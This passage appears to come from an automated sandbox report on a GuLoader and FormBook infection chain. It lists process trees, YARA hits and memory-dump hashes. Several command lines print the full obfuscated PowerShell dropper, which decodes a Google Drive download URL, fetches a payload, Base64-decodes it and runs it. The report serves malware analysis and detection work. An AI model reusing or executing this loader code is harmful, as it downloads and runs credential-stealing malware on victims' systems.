VorttHalvfx FejetAutos Strue-UdsagVkunsta CpmmlUdmatuSadl.e flin Hjemm$,aderFThromoLiv or e aafHulnirStanddsennaiArkitgImmigeGlosetRubbe;He er ');Surere (Herremaend 'AlkyliMuddlfAlb i udpi(antiotAvissePleursKbsvatMiddl-Kronip Tanda VipetDu,tthzygne GrandTLiche:Lusk.\GruppTA skieSpindsKantetBajaduPirridHvedeo Gobl.Stra,tSamarxReg st Ultr)Globa{Poly e eostxHillbi SkubtRaadf} Sual;trise ');$Tidsskriftsudvlgelserne = Herremaend 'Shille,lericRisikhKaldeo Tjen L nje%Ki,keaBr.dop LendpBirthdNo.spaRevalt Tiraasnebo% Do,e\AasteMnyst.eFrankd TsaririskikAnnalaWilmam,rfteeLamb nBe,hptR.ttoeSvveflCri,i.VanddDPro,odTopsagDdska Lserf&halss&Udl,s Telefe ,ilccRkv,khpooftoBugse Malth$S are ';Surere (Herremaend 'Gombe$TilbagSpa.kl Sgepo F,rfbPseu,aSkrd.l P.og:Bi,psFFo tirSl wdi KolitFremtuBrinjr DecieMalminTredi=S,pra(Firsic BystmP umpd unde Te,ot/Pallhc Rapg Conta$.retcT,elamiExu.ad .ibesS.othsUnto kPrejursulteiDelphfTarlet UtilsDiscruBo uldKinesvTilkrl Mes,g Dv,geergonlVrc.ssProtoeSomikrHanden DraweBoxfi)Outte ');Surere (Herremaend 'Anstt$ pibogT,lstl Ch,roParrobEutecaOrkidlKan i:UnsocTDrmmeinucl.r,eproe Guars StrioBloublUkor =Ubesr$,anskHFionnaModstlTur elHum,uoFrimefTaskefDamari.luserIm aveThril.Ensars K.gepSemiolLsereiAdj,nt Muns( Daem$Ri.beSTer.otFilmiaEjendrJvnfrtFond.nPortegDomnel KarmeReju,sHamme)Diosm ');$Halloffire=$Tiresol[0];Surere (Herremaend 'Udsk.$Odo igSygevl Stifo CharbTeor,aAntitlBekle:HenslDUlselrPoussoPolydn AmbinTituliArthrnBarwigGitt,l uperuAfkr.nLaan,dCourtsSrlig= OkseN Gas.e,ardewHisto-interOGelfobMolerjNonpreHandecGracetB,nem BlouS TubiyTap us Par tRupice AshrmMet.e.chinkNBarneeTrde,tDataa.ClencW AstreMistybAbaseCOil.alBas,giBrum,eSpejlnSandet lint ');Surere (Herremaend 'Centg$RokadDTilstrOwerwoUnrevnTangfn Macri T ilnescapgPr,hil MiliuSenionC.rpodDe nesPinde.SkaftHLivereN,ncoaS.irodKol.eeAdelsrDelirs Unbe[Unven$aphesAT,ansp Pi,nyUnvaro CablnTartwi MeshnChees1Danse8 Oper2Snkel]F rsv= Ri,s$folkeMRa leo Non nFi unosafias UdsttKasseisuperc ClarhOrdfoiP 
rlacSorg. ');$Plantaginales173=Herremaend 'Jv frDc talrdykehoUsm,gnAutorn Sttei T.ksnZollegRh.zolXanthu Ko.vnCaverdPastrsS.eak.Kund D Apeno E krwSortin Sh.tl,scitoBran aMammod CardF.emiciHoejalHderseOps a(Regul$JuftsHRadioa ,ounl Na,rlRe,ero Str fEft rfPotleiSam.er DoojeHverv, Bedv$ VestU TroedBinucpboldtoPelobsTeatenDrys.iSkrivnVirilgRygs.)Forur ';$Plantaginales173=$Frituren[1]+$Plantaginales173;$Udposning=$Frituren[0];Surere (Herremaend 'Uegen$c ccigBydefl HedeoRedneb Boneabatc lbevid:MosshS Fwele Frilp,lgefaVelkerpri,rv,lufrcGing.rUnglu=Hek e( PetaTPurlieAlloms epugtskyde- SejrPEquilaSk.tttPrew hSheen Ophi$Sort.U.tjdmdCatnipBe kyoDeters SnoonRecepi Beken TerrgUnive)Dativ ');while (!$Separvcr) {Surere (Herremaend 'skaer$Sleepg eedilfiliao forhbSkovbaFja,tlUnder:olentVCatena D,dinStamtsTalmakTristeRdbyelManiciPalmag Cleas Som,t Drese ejssBigam=backr$Jehult ignarPers uP.ospePit,h ') ;Surere $Plantaginales173;Surere (Herremaend 'KomplSNervetRealkaErinnrFrem,t hypo-SchatSDorsol ,eteeOrigie TeenpP,rip .dmin4Sor,e ');Surere (Herremaend '.atho$Di,itgU,aall Sub.oArmorb,nteraReinvlLim.n:Akva,S.dsteeConvep HoveaGi,ntrDa,bovac rucBohemrDa,br= Pudd(PledgT SuckeSplics NondtAbd,l-ConveP A.sia Asset Toishno,th Asyl$PsykoUFolkedEnt,rpGpiibo Indes,dmntnselvmi Bls.nMajorgbedri)hujed ') ;Surere (Herremaend 'Forfa$VisiogBekenlU.frio Udlbb st,eaChairlGamps:Jor.vOlangup Kli,nGastra AnsiaK,loreHydanlShreds F reeFodgarRe.sesS,ang=Klora$ Pateg Denol SlagoIncurb repraSterelIndlg:SlangBPlansyNonregInte.nAfiseiUncomnHderkg Ih.asPantomSubtesD silsjoseti U brgAnsgn+Sungr+Kredi% Muck$KendiTAlmani PrferSkopueSk,rrsOptagoHandll Bety.HypoccSnderoRamequnoxianCrypttS boe ') ;$Halloffire=$Tiresol[$Opnaaelsers];}Surere (Herremaend ' Isak$ Mgfag orgnlSki po,zimibstavea rserlUncha: TillDFl.lsaDatacaFester Ca.ueAkto,kGeraniDendrsHandet BereeChe gnExtra1Nonab1Rowd.3Patru Enogt=Mi il aguG luoreskubbt Yach-SpateCSandso FiftnAspidtDrhaaeShidenIndiat M,ps Taver$Li,elUTindidOffenp Sta.o DermsKlagenHomefiQ 
arrnSa.sagSiffl ');Surere (Herremaend 'kommu$IntergTr.nslFosteo S.iabBefj.aOverglIdrcd:Pre.oABlo,knPaabdaCou.il.eremoSlattg MohriMatr e Ga,asYetap Ci,no=Str,f Stylt[ StrySKamelyS,artsToptitUnfiteNonscmWrig..ForfrCstal.oTa.dpnBar.ivStuveeFryser Bi.ltBlung]Ru,de:Endot:T,gneFBe.lyrBiunioGenermOrdu.B.rianaSto,rsRo.teeAntib6Pejor4 VariSArchstLemn rLurediKellinFlawegBurgh(overs$FljlsDhennaa.ingwac,ller .ypheDayb k UnreiFot,es aturtDekupeDiscrn Tils1Virak1Dorso3W.oli)Rent, ');Surere (Herremaend '.drin$Autarg.orfrlMundsoDisc.bFremoaBiofylSkriv:InterC Afsku Imbelvolcat AspouSensirSkratoIr,nelAilanoLitisgDetekyGall, Micki=Tingb Ung a[ DemoSGra mySlvets.argitSprinePetramKey l.KbenhTThyroeSlredxRedegt Bl,n. Ko pETos.onDelircIgu noSal sd Ubesi ArgynIkendgAnstr]Skudt:Styre:PreexAN xesSUnhonCUdfleI.fsluII dbr.,rahmGTivolePape tDisteSEge pt Ca.ar ArabiLi,renU,abagHf,rc(diane$IrrigAIwortnSkovtaAstrol Benro Spo.g Offei B.ugergtopsSever)Anst. ');Surere (Herremaend 'T.ans$DiscogNep.elSdmlkoK,opsbSpidsaCarnilStyk.:Spat.SPlatyp ynerePinstrBnnemmK,ytna ReantLeisuoFy rez Reeno chauiDefuncPr.gr= Ento$ Fo,fCDoublu CentlCreedtUdpumuRep.erNo,thoniklalStolpoHjulegTransyForu .RealisEf.acuSuperb DecisFascitDimenrL.satihydronS enogNonni(Scr,e3Kir,e2Mosk 8Be,ys9 ailr3liber3P eud,Samle2Unret8T,stn8,yper2Barn.8Unde.) Tyng ');Surere $Spermatozoic;"
                                        Imagebase:0x7ff760310000
                                        File size:452'608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.2333966169.000002B347A73000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:high
                                        Has exited:true

                                        Target ID:3
                                        Start time:07:02:59
                                        Start date:24/04/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff70f010000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:4
                                        Start time:07:03:01
                                        Start date:24/04/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Medikamentel.Ddg && echo $"
                                        Imagebase:0x7ff7b61b0000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:5
                                        Start time:07:03:10
                                        Start date:24/04/2024
                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Demonland = 1;$Predecreeing='Substrin';$Predecreeing+='g';Function Herremaend($Sursdt){$monuronsnteranimate=$Sursdt.Length-$Demonland;For($monurons=5; $monurons -lt $monuronsnteranimate; $monurons+=(6)){$Alaskans+=$Sursdt.$Predecreeing.Invoke($monurons, $Demonland);}$Alaskans;}function Surere($Adipometer){. ($Disaffirmative) ($Adipometer);}$Monostichic=Herremaend 'AristMDe.imo SjakzSaks.ikortslSportlOmplaarelai/Hiero5Addit..plgk0T,aum An.ta(ProduWEqui.iGeniznIldebdPa.rao SnitwPickesAlleg ,ersoNI,fanTUdpos drown1Wighe0Abbes.Unser0Snoni;Pri o UtakWAfgifi efugnSkal,6Casto4Benin;R.stb FresxTurbu6Homog4 Radb;Round FurcrrVebogv Matr:Famil1 Aste2 Irre1Hvede. Fa,u0Un,er)Gummi unmutG U.dveT lesc ArabkAdvo,o A.ti/Retor2Bi,le0Taale1Folke0Overs0Mede 1Calch0Parti1H.and FlintFPardoiNondirNonvae EstufD,teno Hus.x Pers/Murbr1Filbe2 lapu1b.udo. Un.e0Straf ';$Apyonin182=Herremaend 'EksprUPapirs,ingeeSucrerSpeci-sk.ttASamvigRevaleAfkvinU armt.ofag ';$Halloffire=Herremaend 'Planoh FedetSponttKo,sip SidesNon,r:Speda/Efter/Friskd Kar,rFacadiQv.nsvSlidbeAl,at.BifalgDiloho Socio ,enogSp.cilUndereGlo i. ,nnac reto AfstmGrept/ PadauOv rgcForsk?dyrebeFascixLuftrp ,isco banfr F idtHuffi=Chattd inusoTelefw NattnAftallTranco.anelaArbejd Send&LeggiiUnbludRecla= Dunj1Filmg3 O sts PellIBlokpDEuropg isanKUn oluTrafi2RedskDBuega7Ol,giiP.icaIPosta6 AposzCa,riR ParkxC,mpoA ond4Macaag SoupGTr,jeYtingsS DecoaIniqusVoitu5Ar,aniAl.rm0,asufm Ulovh eriAAdoptTUdfreB icca ';$Startngles=Herremaend 'Redak>Paraf ';$Disaffirmative=Herremaend 'I ebli Vil,e.npatxAdelo ';$Forfrdiget='Tented';Surere (Herremaend ' UlovSsweepefeerstTandk-AttacCSpillodevionTryk.tSodeneProtenOpsentLaves Dunc - A.prPUnderaSubmytStal,hnondi ProtoTkun.t:H,lvt\ ebusTFircieHusassSpytstVesicuStrogdRecipoSugge. 
VorttHalvfx FejetAutos Strue-UdsagVkunsta CpmmlUdmatuSadl.e flin Hjemm$,aderFThromoLiv or e aafHulnirStanddsennaiArkitgImmigeGlosetRubbe;He er ');Surere (Herremaend 'AlkyliMuddlfAlb i udpi(antiotAvissePleursKbsvatMiddl-Kronip Tanda VipetDu,tthzygne GrandTLiche:Lusk.\GruppTA skieSpindsKantetBajaduPirridHvedeo Gobl.Stra,tSamarxReg st Ultr)Globa{Poly e eostxHillbi SkubtRaadf} Sual;trise ');$Tidsskriftsudvlgelserne = Herremaend 'Shille,lericRisikhKaldeo Tjen L nje%Ki,keaBr.dop LendpBirthdNo.spaRevalt Tiraasnebo% Do,e\AasteMnyst.eFrankd TsaririskikAnnalaWilmam,rfteeLamb nBe,hptR.ttoeSvveflCri,i.VanddDPro,odTopsagDdska Lserf&halss&Udl,s Telefe ,ilccRkv,khpooftoBugse Malth$S are ';Surere (Herremaend 'Gombe$TilbagSpa.kl Sgepo F,rfbPseu,aSkrd.l P.og:Bi,psFFo tirSl wdi KolitFremtuBrinjr DecieMalminTredi=S,pra(Firsic BystmP umpd unde Te,ot/Pallhc Rapg Conta$.retcT,elamiExu.ad .ibesS.othsUnto kPrejursulteiDelphfTarlet UtilsDiscruBo uldKinesvTilkrl Mes,g Dv,geergonlVrc.ssProtoeSomikrHanden DraweBoxfi)Outte ');Surere (Herremaend 'Anstt$ pibogT,lstl Ch,roParrobEutecaOrkidlKan i:UnsocTDrmmeinucl.r,eproe Guars StrioBloublUkor =Ubesr$,anskHFionnaModstlTur elHum,uoFrimefTaskefDamari.luserIm aveThril.Ensars K.gepSemiolLsereiAdj,nt Muns( Daem$Ri.beSTer.otFilmiaEjendrJvnfrtFond.nPortegDomnel KarmeReju,sHamme)Diosm ');$Halloffire=$Tiresol[0];Surere (Herremaend 'Udsk.$Odo igSygevl Stifo CharbTeor,aAntitlBekle:HenslDUlselrPoussoPolydn AmbinTituliArthrnBarwigGitt,l uperuAfkr.nLaan,dCourtsSrlig= OkseN Gas.e,ardewHisto-interOGelfobMolerjNonpreHandecGracetB,nem BlouS TubiyTap us Par tRupice AshrmMet.e.chinkNBarneeTrde,tDataa.ClencW AstreMistybAbaseCOil.alBas,giBrum,eSpejlnSandet lint ');Surere (Herremaend 'Centg$RokadDTilstrOwerwoUnrevnTangfn Macri T ilnescapgPr,hil MiliuSenionC.rpodDe nesPinde.SkaftHLivereN,ncoaS.irodKol.eeAdelsrDelirs Unbe[Unven$aphesAT,ansp Pi,nyUnvaro CablnTartwi MeshnChees1Danse8 Oper2Snkel]F rsv= Ri,s$folkeMRa leo Non nFi unosafias UdsttKasseisuperc ClarhOrdfoiP 
rlacSorg. ');$Plantaginales173=Herremaend 'Jv frDc talrdykehoUsm,gnAutorn Sttei T.ksnZollegRh.zolXanthu Ko.vnCaverdPastrsS.eak.Kund D Apeno E krwSortin Sh.tl,scitoBran aMammod CardF.emiciHoejalHderseOps a(Regul$JuftsHRadioa ,ounl Na,rlRe,ero Str fEft rfPotleiSam.er DoojeHverv, Bedv$ VestU TroedBinucpboldtoPelobsTeatenDrys.iSkrivnVirilgRygs.)Forur ';$Plantaginales173=$Frituren[1]+$Plantaginales173;$Udposning=$Frituren[0];Surere (Herremaend 'Uegen$c ccigBydefl HedeoRedneb Boneabatc lbevid:MosshS Fwele Frilp,lgefaVelkerpri,rv,lufrcGing.rUnglu=Hek e( PetaTPurlieAlloms epugtskyde- SejrPEquilaSk.tttPrew hSheen Ophi$Sort.U.tjdmdCatnipBe kyoDeters SnoonRecepi Beken TerrgUnive)Dativ ');while (!$Separvcr) {Surere (Herremaend 'skaer$Sleepg eedilfiliao forhbSkovbaFja,tlUnder:olentVCatena D,dinStamtsTalmakTristeRdbyelManiciPalmag Cleas Som,t Drese ejssBigam=backr$Jehult ignarPers uP.ospePit,h ') ;Surere $Plantaginales173;Surere (Herremaend 'KomplSNervetRealkaErinnrFrem,t hypo-SchatSDorsol ,eteeOrigie TeenpP,rip .dmin4Sor,e ');Surere (Herremaend '.atho$Di,itgU,aall Sub.oArmorb,nteraReinvlLim.n:Akva,S.dsteeConvep HoveaGi,ntrDa,bovac rucBohemrDa,br= Pudd(PledgT SuckeSplics NondtAbd,l-ConveP A.sia Asset Toishno,th Asyl$PsykoUFolkedEnt,rpGpiibo Indes,dmntnselvmi Bls.nMajorgbedri)hujed ') ;Surere (Herremaend 'Forfa$VisiogBekenlU.frio Udlbb st,eaChairlGamps:Jor.vOlangup Kli,nGastra AnsiaK,loreHydanlShreds F reeFodgarRe.sesS,ang=Klora$ Pateg Denol SlagoIncurb repraSterelIndlg:SlangBPlansyNonregInte.nAfiseiUncomnHderkg Ih.asPantomSubtesD silsjoseti U brgAnsgn+Sungr+Kredi% Muck$KendiTAlmani PrferSkopueSk,rrsOptagoHandll Bety.HypoccSnderoRamequnoxianCrypttS boe ') ;$Halloffire=$Tiresol[$Opnaaelsers];}Surere (Herremaend ' Isak$ Mgfag orgnlSki po,zimibstavea rserlUncha: TillDFl.lsaDatacaFester Ca.ueAkto,kGeraniDendrsHandet BereeChe gnExtra1Nonab1Rowd.3Patru Enogt=Mi il aguG luoreskubbt Yach-SpateCSandso FiftnAspidtDrhaaeShidenIndiat M,ps Taver$Li,elUTindidOffenp Sta.o DermsKlagenHomefiQ 
arrnSa.sagSiffl ');Surere (Herremaend 'kommu$IntergTr.nslFosteo S.iabBefj.aOverglIdrcd:Pre.oABlo,knPaabdaCou.il.eremoSlattg MohriMatr e Ga,asYetap Ci,no=Str,f Stylt[ StrySKamelyS,artsToptitUnfiteNonscmWrig..ForfrCstal.oTa.dpnBar.ivStuveeFryser Bi.ltBlung]Ru,de:Endot:T,gneFBe.lyrBiunioGenermOrdu.B.rianaSto,rsRo.teeAntib6Pejor4 VariSArchstLemn rLurediKellinFlawegBurgh(overs$FljlsDhennaa.ingwac,ller .ypheDayb k UnreiFot,es aturtDekupeDiscrn Tils1Virak1Dorso3W.oli)Rent, ');Surere (Herremaend '.drin$Autarg.orfrlMundsoDisc.bFremoaBiofylSkriv:InterC Afsku Imbelvolcat AspouSensirSkratoIr,nelAilanoLitisgDetekyGall, Micki=Tingb Ung a[ DemoSGra mySlvets.argitSprinePetramKey l.KbenhTThyroeSlredxRedegt Bl,n. Ko pETos.onDelircIgu noSal sd Ubesi ArgynIkendgAnstr]Skudt:Styre:PreexAN xesSUnhonCUdfleI.fsluII dbr.,rahmGTivolePape tDisteSEge pt Ca.ar ArabiLi,renU,abagHf,rc(diane$IrrigAIwortnSkovtaAstrol Benro Spo.g Offei B.ugergtopsSever)Anst. ');Surere (Herremaend 'T.ans$DiscogNep.elSdmlkoK,opsbSpidsaCarnilStyk.:Spat.SPlatyp ynerePinstrBnnemmK,ytna ReantLeisuoFy rez Reeno chauiDefuncPr.gr= Ento$ Fo,fCDoublu CentlCreedtUdpumuRep.erNo,thoniklalStolpoHjulegTransyForu .RealisEf.acuSuperb DecisFascitDimenrL.satihydronS enogNonni(Scr,e3Kir,e2Mosk 8Be,ys9 ailr3liber3P eud,Samle2Unret8T,stn8,yper2Barn.8Unde.) Tyng ');Surere $Spermatozoic;"
                                        Imagebase:0xfd0000
                                        File size:433'152 bytes
                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.1925751155.0000000008790000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.1919062447.0000000005DF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.1925873390.00000000091BB000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:high
                                        Has exited:true

                                        Target ID:6
                                        Start time:07:03:11
                                        Start date:24/04/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Medikamentel.Ddg && echo $"
                                        Imagebase:0xc50000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:10
                                        Start time:07:03:41
                                        Start date:24/04/2024
                                        Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                        Imagebase:0xe0000
                                        File size:516'608 bytes
                                        MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        Target ID:11
                                        Start time:07:03:41
                                        Start date:24/04/2024
                                        Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                        Imagebase:0xe0000
                                        File size:516'608 bytes
                                        MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        Target ID:12
                                        Start time:07:03:41
                                        Start date:24/04/2024
                                        Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                        Imagebase:0x7ff70f010000
                                        File size:516'608 bytes
                                        MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2249433724.0000000002CB0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.2249433724.0000000002CB0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                        Reputation:moderate
                                        Has exited:true

                                        Target ID:16
                                        Start time:07:04:25
                                        Start date:24/04/2024
                                        Path:C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe"
                                        Imagebase:0x3c0000
                                        File size:140'800 bytes
                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                        Reputation:high
                                        Has exited:false

                                        Target ID:17
                                        Start time:07:04:27
                                        Start date:24/04/2024
                                        Path:C:\Windows\SysWOW64\replace.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\SysWOW64\replace.exe"
                                        Imagebase:0x20000
                                        File size:18'944 bytes
                                        MD5 hash:A7F2E9DD9DE1396B1250F413DA2F6C08
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.2595044684.00000000029A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.2595044684.00000000029A0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.2595118145.00000000029E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.2595118145.00000000029E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.2593836346.00000000024F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.2593836346.00000000024F0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                        Reputation:low
                                        Has exited:false

                                        Target ID:18
                                        Start time:07:04:39
                                        Start date:24/04/2024
                                        Path:C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe"
                                        Imagebase:0x3c0000
                                        File size:140'800 bytes
                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.2595491228.0000000002250000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000012.00000002.2595491228.0000000002250000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                        Reputation:high
                                        Has exited:false

                                        Target ID:19
                                        Start time:07:04:46
                                        Start date:24/04/2024
                                        Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                        Imagebase:0xe0000
                                        File size:516'608 bytes
                                        MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        Target ID:20
                                        Start time:07:04:47
                                        Start date:24/04/2024
                                        Path:C:\Windows\System32\rundll32.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                        Imagebase:0x7ff671210000
                                        File size:71'680 bytes
                                        MD5 hash:EF3179D498793BF4234F708D3BE28633
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:21
                                        Start time:07:04:51
                                        Start date:24/04/2024
                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                        Imagebase:0x7ff73feb0000
                                        File size:676'768 bytes
                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:23
                                        Start time:07:04:56
                                        Start date:24/04/2024
                                        Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                        Imagebase:0xe0000
                                        File size:516'608 bytes
                                        MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2365324219.00007FF886E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ff886e40000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a3541f6ed30be1935f8d8ded15db133a47f018be7fb9c0913bef9e1d80f13d16
                                          • Instruction ID: 2040ec574d30d10bdf7f6e12f0ade6fe65f864f57759444cf0f4177be9ea66bf
                                          • Opcode Fuzzy Hash: a3541f6ed30be1935f8d8ded15db133a47f018be7fb9c0913bef9e1d80f13d16
                                          • Instruction Fuzzy Hash: A0F19330918A8D8FEBA8DF28D8557E937E1FF54350F14426AE84DC7291DF38A945CB82
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2365324219.00007FF886E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ff886e40000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bb4ed7615d1e37ea04c34a3b9f960e0a206fa3429fc88db642430347dc77d232
                                          • Instruction ID: 2378657476c64345b7e58cc0470508854c9eeaf000740c8ddefcad49be9f2370
                                          • Opcode Fuzzy Hash: bb4ed7615d1e37ea04c34a3b9f960e0a206fa3429fc88db642430347dc77d232
                                          • Instruction Fuzzy Hash: E6E1B130918A8E8FEBA8DF28C8557E977E1FF54350F14426ED84DC7291DE78A944CB82
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2366743858.00007FF886F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ff886f10000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cde7087f83ab91da5488b82ca683398909215be27049b015a11c5865d3f87feb
                                          • Instruction ID: 678cff758bd285c6e675e0c6103e2e89a76e60837649efed45e0191b4edb71f4
                                          • Opcode Fuzzy Hash: cde7087f83ab91da5488b82ca683398909215be27049b015a11c5865d3f87feb
